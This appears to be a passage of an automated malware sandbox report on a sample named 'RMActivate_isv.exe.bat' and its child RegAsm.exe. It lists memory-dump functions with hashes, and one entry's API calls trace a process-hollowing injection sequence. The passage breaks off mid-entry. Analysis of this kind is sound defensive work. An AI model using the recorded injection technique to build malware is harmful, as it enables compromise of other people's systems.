Uniqueness

Uniqueness Score: -1.00%

Function 05435F78, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c395c426b382421020d22954bac83089d97e9d9ea93050b51df56584a6928204
Instruction ID: e79b162b80c459a26d94bc1b7ee92901a2347c2412f9e0cb2a244d3250880e25
Opcode Fuzzy Hash: c395c426b382421020d22954bac83089d97e9d9ea93050b51df56584a6928204
Instruction Fuzzy Hash: 79D02B3174C9258FD710259850057ED338EAB48260B050127EA07C3254CE958C4147E7

Uniqueness

Uniqueness Score: -1.00%

Function 0543ED48, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e5f13d76d726f038b04df2d638a7d54924ac1721d442f69763e30dc66738f9
Instruction ID: b3cb04bd504dc55932599f5c06307226b3be5f6304d4e51dd1fe7f1a99503ebf
Opcode Fuzzy Hash: 85e5f13d76d726f038b04df2d638a7d54924ac1721d442f69763e30dc66738f9
Instruction Fuzzy Hash: F4D0A734340138179A08E5ADCC1197B738FCFC5510304846EF80ED7341CD62AC0293D1

Uniqueness

Uniqueness Score: -1.00%

Function 05437180, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fc6a1c6bf2399ad8aa0739c96adc28a33abf7914936ec2a72f06b9069f437f3
Instruction ID: ac5c7b84a29178f479aa5aba7846340c765f4d59cdb6b94c0b02b723d01051c5
Opcode Fuzzy Hash: 6fc6a1c6bf2399ad8aa0739c96adc28a33abf7914936ec2a72f06b9069f437f3
Instruction Fuzzy Hash: F9D0C2730083509BEB75CA64D8026E2BBABEB89324F04065FC0C305B208661E386C392

Uniqueness

Uniqueness Score: -1.00%

Function 0543DC68, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5e83e4a04ceafd2bcc5dd5b9a2a3e006b64bde3f5be69db4d36faf2b775c54
Instruction ID: 61e61de230bb771ecec3afa29d399fe3b95550939c23129b199a4ae33870bf96
Opcode Fuzzy Hash: 0e5e83e4a04ceafd2bcc5dd5b9a2a3e006b64bde3f5be69db4d36faf2b775c54
Instruction Fuzzy Hash: 20D05BB1939214DFC754D55490029F2B3FEE70D5A1B00492BF44B86134D5E2980383D1

Uniqueness

Uniqueness Score: -1.00%

Function 05430170, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 552358a8548bc07f3c01e6fee4ef9be49f5ea49529b5ae36eecc4e479823351d
Instruction ID: 106edea21b1305a24f5c12e5e42ce90072d3d092b8ba2066007bb922c76dc52c
Opcode Fuzzy Hash: 552358a8548bc07f3c01e6fee4ef9be49f5ea49529b5ae36eecc4e479823351d
Instruction Fuzzy Hash: 7DD05E75641301CFDB192BB0E00D329375AAB48755F610A78D40682751EE3BD896C500

Uniqueness

Uniqueness Score: -1.00%

Function 054302A0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46078fb00b55d00ac955afad3a7fd4c8c71ab5a65eb0e7a28e0d86ee663fbbed
Instruction ID: 6bd8cfbe6ed7129bab8c268efabfdecb63db6dedce41e8b2b2c183f53c9ef2b8
Opcode Fuzzy Hash: 46078fb00b55d00ac955afad3a7fd4c8c71ab5a65eb0e7a28e0d86ee663fbbed
Instruction Fuzzy Hash: 3ED05E35514624C7C254D618E84BAC236E9EB48300B24CE1AE86A9AA18CE60BC064761

Uniqueness

Uniqueness Score: -1.00%

Function 05432D20, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97f83a92ce732ab9ecbdc7ec8f05014bbbfe7a8593a07c35d385f1bfa1ff0233
Instruction ID: 3ff257a644eb7d3d5a319acd7bf72d2e05f49f9da39cc426e67a6d3fedcba4d6
Opcode Fuzzy Hash: 97f83a92ce732ab9ecbdc7ec8f05014bbbfe7a8593a07c35d385f1bfa1ff0233
Instruction Fuzzy Hash: 6AD0223C08CA04A2D3908084DC0BBF63A15C30C701F780803A20B884B4CCD4A1060502

Uniqueness

Uniqueness Score: -1.00%

Function 05438DE0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189de735017a1352ab4545c896e5b13ffe6a50ca9c49400ac33f664f6c6cd92c
Instruction ID: f804ecb144c7867ef27d3416a1b1d48d3507fa46cff485d01490586852f1aace
Opcode Fuzzy Hash: 189de735017a1352ab4545c896e5b13ffe6a50ca9c49400ac33f664f6c6cd92c
Instruction Fuzzy Hash: 28C0805525A744D3D7120690AD0FFE5AD358708712F110D07F1DD745D0E15105214514

Uniqueness

Uniqueness Score: -1.00%

Function 0543E818, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e7f8cdc54eac6eceac7fa3e0c29ad67a8d5d95c9b3f2469b5e874a7bb4d2893
Instruction ID: a3638cd5fd5afabb31226e9d15a14013eda7c5fb308055405eeaff36a9587387
Opcode Fuzzy Hash: 5e7f8cdc54eac6eceac7fa3e0c29ad67a8d5d95c9b3f2469b5e874a7bb4d2893
Instruction Fuzzy Hash: D0C01235A06218935F2471A569064E9765DDD09155B4000BBD90957210E621A92583D1

Uniqueness

Uniqueness Score: -1.00%

Function 0543E498, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8423054f6ef1ad940e976de24e581f3781e8db6bb9ca3bcb29e445b998ce71d1
Instruction ID: 3f45f002bc721387cc24794cee20f8395a0ed2467947e4126fb08a9190b4db74
Opcode Fuzzy Hash: 8423054f6ef1ad940e976de24e581f3781e8db6bb9ca3bcb29e445b998ce71d1
Instruction Fuzzy Hash: 23D0A93000B205CB8724CA01E8028E2B36FEB1C232340092BD04B03620ABAAB822ABD0

Uniqueness

Uniqueness Score: -1.00%

Function 0543064F, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 253a7b70664fae5e1137ca6718620614f68884b8d71d8fa61a3ec55c9e3cb5b7
Instruction ID: a43610b46e14d90579d5373d03ab263c3c6cdd5954fbba699b352c73b799bac1
Opcode Fuzzy Hash: 253a7b70664fae5e1137ca6718620614f68884b8d71d8fa61a3ec55c9e3cb5b7
Instruction Fuzzy Hash: BAD022B28461148FC3048A719C4A3AA7306DBA9204F108932840501224DC32946B4800

Uniqueness

Uniqueness Score: -1.00%

Function 05436AF0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0939ec5680cffb9ecca245d0aafbbebb033a67d769e75d7ec85179cdc98f5e
Instruction ID: ad6b15aae15eeb90e1f05e1e990571bfa1277e29efc14487612d43c5ff0553cd
Opcode Fuzzy Hash: 9a0939ec5680cffb9ecca245d0aafbbebb033a67d769e75d7ec85179cdc98f5e
Instruction Fuzzy Hash: 6FD0423AA00004DFC704CB88D5959D9F7F1EB88325F29C1A6D915A7252C732ED56CE50

Uniqueness

Uniqueness Score: -1.00%

Function 02C123F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.612556671.0000000002C12000.00000040.00000001.sdmp, Offset: 02C12000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a75e28d16fd73a1d408e271c27130668cda7e96940cb2d480444e228b8286ea3
Instruction ID: 63ddb802249cdcb93824c261a66737fe41d9b3c3ad0612cd3cb8fe77151d018d
Opcode Fuzzy Hash: a75e28d16fd73a1d408e271c27130668cda7e96940cb2d480444e228b8286ea3
Instruction Fuzzy Hash: 72D05B792045914FD3168A1CC156F5537D4AB92B08F4644FDEC008B663C364E981F101

Uniqueness

Uniqueness Score: -1.00%

Function 0543A584, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa64f481c0f1cc59e911aaa58568c4f28638e3faf0a4a4feabbbbf91fd0cdf6
Instruction ID: bb00c39c9acbd97cf00245af1b37c2fe208f3eb2d78177b05b21026ca37230d2
Opcode Fuzzy Hash: 5aa64f481c0f1cc59e911aaa58568c4f28638e3faf0a4a4feabbbbf91fd0cdf6
Instruction Fuzzy Hash: 12D02236F02008CBCB00DAACF8484CCF7B0F680221B808162E50283A18EB798C298BD0

Uniqueness

Uniqueness Score: -1.00%

Function 02C123BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.612556671.0000000002C12000.00000040.00000001.sdmp, Offset: 02C12000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86fa9d3b5e5a313c32aac42e24042cbe81125ddd43d59d70d9205063486a7d87
Instruction ID: 951b1a5d6d7481030a03e96a3c88204dae27fa4e5d9020ff5504c6b6f54272a8
Opcode Fuzzy Hash: 86fa9d3b5e5a313c32aac42e24042cbe81125ddd43d59d70d9205063486a7d87
Instruction Fuzzy Hash: E2D05E382001818FD715DB0CC695F5937D8AB82B08F4644E8AC048B662C3B4D981E600

Uniqueness

Uniqueness Score: -1.00%

Function 0543C469, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94e33e8ed670746de44adb4fe12ce0877fbe9efa1f16c38f92510a4aca471a3e
Instruction ID: b41af474935809f4cb052264172d1f4aff6e668518f9884eeb23f4aceadcbae4
Opcode Fuzzy Hash: 94e33e8ed670746de44adb4fe12ce0877fbe9efa1f16c38f92510a4aca471a3e
Instruction Fuzzy Hash: A1D0121500F3E22BC3271B300C368927F348D830083AE08EFE0C08A883C458924BC372

Uniqueness

Uniqueness Score: -1.00%

Function 05435700, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a166beb2be4c094ae65c0f7cc0d3cedc2064c540193e75331d0cee8c2ada6956
Instruction ID: 8af0a02f7337d95af55f277058bf3afb0d0e76787f68888dc4cfe23df3692c40
Opcode Fuzzy Hash: a166beb2be4c094ae65c0f7cc0d3cedc2064c540193e75331d0cee8c2ada6956
Instruction Fuzzy Hash: A3C02B73040208C3C7102164B8D77E37B0DA710954F041213E109C8221FF04D6091071

Uniqueness

Uniqueness Score: -1.00%

Function 0543770E, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd74bdfd8acdb76e3b8a710bf5d3c24d673707f593a5293670993ac453c27871
Instruction ID: 0b41545d5c496461ea7508f6c5ef526a4ba32e903e42e22e5c771a27ca412435
Opcode Fuzzy Hash: fd74bdfd8acdb76e3b8a710bf5d3c24d673707f593a5293670993ac453c27871
Instruction Fuzzy Hash: A6D05E74E10609CF8B12CF75D9180ED7BF1EB083103200726D402973D1E7346D55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05430180, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf1a44ae0f5514c091fad5e7b4c1c4ded9d884b21d6cd8923ed36fc939070e96
Instruction ID: 99096318209faad1a4c68f12a1fe7b708b9c25ba11ee32958708fa7252d80f14
Opcode Fuzzy Hash: cf1a44ae0f5514c091fad5e7b4c1c4ded9d884b21d6cd8923ed36fc939070e96
Instruction Fuzzy Hash: 0FD0CA30690304CBCB282BB4A01852833AAAB88206721097CD90686740EE3AE8A4CA14

Uniqueness

Uniqueness Score: -1.00%

Function 05435710, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ddd1daaa7338a995139bb1c2430b6538cbd0f758a3b564a280bf166f2cbba88
Instruction ID: 61a98172cb37c61becd93214eef6c3dab49f626aeddee3cbb2714a590dcb0a71
Opcode Fuzzy Hash: 5ddd1daaa7338a995139bb1c2430b6538cbd0f758a3b564a280bf166f2cbba88
Instruction Fuzzy Hash: CBC08C30A90204CB8F2027B0258A7BE3B4D6B041817020A56E90A85210EF2484148161

Uniqueness

Uniqueness Score: -1.00%

Function 05438F80, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23c4f1c37e3f9ae464e37c6076986574c77b0e88bf6310dcdc771bbd744554c8
Instruction ID: d9a1411b1e1e14634938a37d3e7eb971cd28f752fc25972687c9738ee9074b90
Opcode Fuzzy Hash: 23c4f1c37e3f9ae464e37c6076986574c77b0e88bf6310dcdc771bbd744554c8
Instruction Fuzzy Hash: EBB0923236560C0BEB50A6F67846B66778D9740628F4408B2B50CC1A01E94AE4902152

Uniqueness

Uniqueness Score: -1.00%

Function 05432EC0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030e64a3c143ad4cbc01ad6edf0940a8afc7ac891309a7c8f3291c73dfeda3e0
Instruction ID: bbfac3de000a5a69c4a4fe071d6656b857bc507b2f33ab76ff27e13bbf4ff322
Opcode Fuzzy Hash: 030e64a3c143ad4cbc01ad6edf0940a8afc7ac891309a7c8f3291c73dfeda3e0
Instruction Fuzzy Hash: 43B092352A82080BEB6096B6784ABA6338CA780A19F5404A2B80CC5A40E996E4E42140

Uniqueness

Uniqueness Score: -1.00%

Function 05430660, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c297ceb55ed3bb62280741d0698ad4767c128f7541a3daad79852409451918
Instruction ID: 95dede0368078c25404438f933f83bd18cd4a15529f9287c1002ba209b8431ef
Opcode Fuzzy Hash: 37c297ceb55ed3bb62280741d0698ad4767c128f7541a3daad79852409451918
Instruction Fuzzy Hash: 89C02B30086218CFC31496722C0E679B20A9AC5301300C9338409010388D3294738811

Uniqueness

Uniqueness Score: -1.00%

Function 0543ED90, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ee4b4ef91fe61e64848ac5420c155de313cf0a03dfe0accc5a14fc6d2967ec8
Instruction ID: 5d70e89150433017b032e9329868d13b2558fde2e79d9b9856d84ae7839a2ea0
Opcode Fuzzy Hash: 6ee4b4ef91fe61e64848ac5420c155de313cf0a03dfe0accc5a14fc6d2967ec8
Instruction Fuzzy Hash: C4B01220E8270C4BEE9033F1700D21C7B8C19848507C00516990D43201BF74A81444B5

Uniqueness

Uniqueness Score: -1.00%

Function 05436B14, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
Instruction ID: e86e413e87236d14871cee7f8e70d8a3dad69d6774efc723094855747e0832db
Opcode Fuzzy Hash: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
Instruction Fuzzy Hash: 96B092B7A04019D9DB00CA84B4463EDFB20E794329F104023C31052001C3720169CA91

Uniqueness

Uniqueness Score: -1.00%

Function 0543CE40, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c8cfd581a5404a3e88451c7e5bbe683f4ec16e4a1edfee3734818a8567df7d
Instruction ID: d32f41093b21415e1e54fefbaa9a4113f01c500c7fb009011144d97a66d8eedf
Opcode Fuzzy Hash: e3c8cfd581a5404a3e88451c7e5bbe683f4ec16e4a1edfee3734818a8567df7d
Instruction Fuzzy Hash: 3DB09B30144304D7C300D719DCCB4B57A5DFD056517901515E505511999FB51D5B46D5

Uniqueness

Uniqueness Score: -1.00%

Function 05438E03, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b45b71d987d97c1a4dd1ecdbc429c13135c89e197eed87ef6138e9898a231dc
Instruction ID: 83d0f7a45bf203a7d4612bbfa9700a3d92f56d3c2d36f761cee128ea6e266528
Opcode Fuzzy Hash: 3b45b71d987d97c1a4dd1ecdbc429c13135c89e197eed87ef6138e9898a231dc
Instruction Fuzzy Hash: 03B0127028B204E3D71086402C0BBF0E523531C711F000C03B10F684E115910006541A

Uniqueness

Uniqueness Score: -1.00%

Function 0543CE3F, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6500702c05a4c733ca08c833dd1f406f3e41085b0f1e04f967accc4bc3a0a8
Instruction ID: 645da38aa4d7cd970f51d20b104830249adc308107e46dabef0983b4ac0fde27
Opcode Fuzzy Hash: 9d6500702c05a4c733ca08c833dd1f406f3e41085b0f1e04f967accc4bc3a0a8
Instruction Fuzzy Hash: D0C04C30544244DAC3519728A8CB4F87F26BE452517501615E546511998FA50D5B8A55

Uniqueness

Uniqueness Score: -1.00%

Function 05435B92, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59f61a9309766929fb4ea24d7829de7ff707e96a80a5f61a097fdc810ec1663b
Instruction ID: 430bbfb02457737c35c4daeddfff4c3627ca98fa1a5d40908b3da8b0b12305f7
Opcode Fuzzy Hash: 59f61a9309766929fb4ea24d7829de7ff707e96a80a5f61a097fdc810ec1663b
Instruction Fuzzy Hash: 90B0025259211586DE105F5CD946715B570FB41345FAA1965908181640D958405C8615

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RMActivate_isv.exe.bat PID: 6788 Parent PID: 3440 RMActivate_isv.exe.batCOMMON

Executed Functions

Function 016D1C68, Relevance: 15.2, APIs: 10, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 016D1D16
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 016D1D3B
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 016D1D55
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 016D1DA0
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 016D1DC5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 016D1E08
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 016D1E95
NtGetContextThread.NTDLL(?,?), ref: 016D1EAF
NtSetContextThread.NTDLL(?,00010007), ref: 016D1ED3
NtResumeThread.NTDLL(?,00000000), ref: 016D1EE5

Memory Dump Source

Source File: 0000000E.00000003.593880818.00000000016D0000.00000040.00000001.sdmp, Offset: 016D0000, based on PE: false

Similarity

API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
String ID:
API String ID: 3307612235-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: a5d02927913b5e0023dca0b513805ce6d0a1e7283402fe0cf6ca3a91a607f381
Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction Fuzzy Hash: 5891F472900249AFDF21DFA5CC89EEEBBB9FF49705F004059FA09EA150D771AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 016D00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 016D0199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 016D01B8

Strings

@, xrefs: 016D018C
en, xrefs: 016D0150
wcsl, xrefs: 016D0149
NtMapViewOfSectionNtOpenSection, xrefs: 016D0128, 016D012B
NtOpenSection, xrefs: 016D011D, 016D0120

Memory Dump Source

Source File: 0000000E.00000003.593880818.00000000016D0000.00000040.00000001.sdmp, Offset: 016D0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 9f50296b790eeb4d85b6f8cfa7afca32611eb4dbb0b1f4be3e846b3a0bad10ee
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: 703133B1D00259EFCB10CFE4C881ADEBBB8FF08750F20416AE514EB250E7749A05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 016D1EFB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(00000000,00000000,?,?), ref: 016D1FEF

Part of subcall function 016D1C68: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 016D1D16

Strings

d, xrefs: 016D201A

Memory Dump Source

Source File: 0000000E.00000003.593880818.00000000016D0000.00000040.00000001.sdmp, Offset: 016D0000, based on PE: false

Similarity

API ID: Create$MutexProcess
String ID: d
API String ID: 2089245102-2564639436
Opcode ID: 55f4902233fde1e26cce70f3b023e41808e665511c747be7e573a5810036b90b
Instruction ID: db8143eb9d3ae672295d935fb039b2f9c2b7857754d8e12de1b17601365f228b
Opcode Fuzzy Hash: 55f4902233fde1e26cce70f3b023e41808e665511c747be7e573a5810036b90b
Instruction Fuzzy Hash: 0B41503655C381A9E6108FA0D811B7BB3A5EF84B21F105D1EF988CB1D0E6B28694C79B

Uniqueness

Uniqueness Score: -1.00%

Function 016D1C67, Relevance: 1.6, APIs: 1, Instructions: 68nativeprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 016D1D16
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 016D1D3B
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 016D1D55
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 016D1DA0
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 016D1DC5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 016D1E08

Memory Dump Source

Source File: 0000000E.00000003.593880818.00000000016D0000.00000040.00000001.sdmp, Offset: 016D0000, based on PE: false

Similarity

API ID: Section$CreateProcessView$InformationMemoryQueryReadVirtual
String ID:
API String ID: 535407514-0
Opcode ID: ac6777cfa9a3a66d1887918250cde6ac5a8fd5382d1ea9283968dc3f45cdbe55
Instruction ID: ccfd71a5aac53c9b4be8cb9893c6a9969a05bd55d0ee30fb8d2edd86447e2f17
Opcode Fuzzy Hash: ac6777cfa9a3a66d1887918250cde6ac5a8fd5382d1ea9283968dc3f45cdbe55
Instruction Fuzzy Hash: F121D5B290015CAFDF309FA5CC49EDEBBBCEF89715F00445AEA09E6141D7719A84CB60

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RegAsm.exe PID: 7040 Parent PID: 6788 RegAsm.exeCOMMON

Executed Functions

Function 051B3850, Relevance: 2.0, Strings: 1, Instructions: 760COMMON

Download Yara Rule

Strings

>_Ir, xrefs: 051B3F9D

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: >_Ir
API String ID: 0-3386957151
Opcode ID: 31aaaf23fd87e47cd9b2ef97b409e3ee5562e0cc4b3b54305a3b97c40624ed35
Instruction ID: d611fe81398c58eaf377f141e00ee34c60b1984d3371baddbf02ee9d5d8ead63
Opcode Fuzzy Hash: 31aaaf23fd87e47cd9b2ef97b409e3ee5562e0cc4b3b54305a3b97c40624ed35
Instruction Fuzzy Hash: 2952E371A00205DFDB15CF68C8849E9BBF2FF85300B2989AAD525DF256C7B1EC51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 051B23A0, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3766dbafa205204d21f8d0d4a54a89020deb75330fc828ebc042dc771c39081d
Instruction ID: f0e7226dd29ac8f81bb147e9f3e223852de2fbbd3ee2115cbdae0eef435f6d43
Opcode Fuzzy Hash: 3766dbafa205204d21f8d0d4a54a89020deb75330fc828ebc042dc771c39081d
Instruction Fuzzy Hash: 0F12B034A00215CFE728DFB4C5846ADBBF2FF84304F258179D466AB655DBB88C8ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 051B2FA8, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be9256ee55e028086824f82bfc3bdd3d308c58b747c5e5f385fe6735cba5018c
Instruction ID: eaeb84d6876771e89b0f3b57f2fa72b515232316c3a7ccc026b5bdb3792db4bb
Opcode Fuzzy Hash: be9256ee55e028086824f82bfc3bdd3d308c58b747c5e5f385fe6735cba5018c
Instruction Fuzzy Hash: 0D817D31F001159BEB28DB69C994AAEBBE3AFC8310B2A8579D415EB355DF71DC018B90

Uniqueness

Uniqueness Score: -1.00%

Function 051B09A5, Relevance: 5.2, Strings: 4, Instructions: 175COMMON

Download Yara Rule

Strings

X1kr, xrefs: 051B0A5A
X1kr, xrefs: 051B0A50
X1kr, xrefs: 051B0A98
X1kr, xrefs: 051B0AA2

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: X1kr$X1kr$X1kr$X1kr
API String ID: 0-2451847431
Opcode ID: e4154e24eec334436c9eeb8826d92ad811607a219879158b2b0927b8b495709a
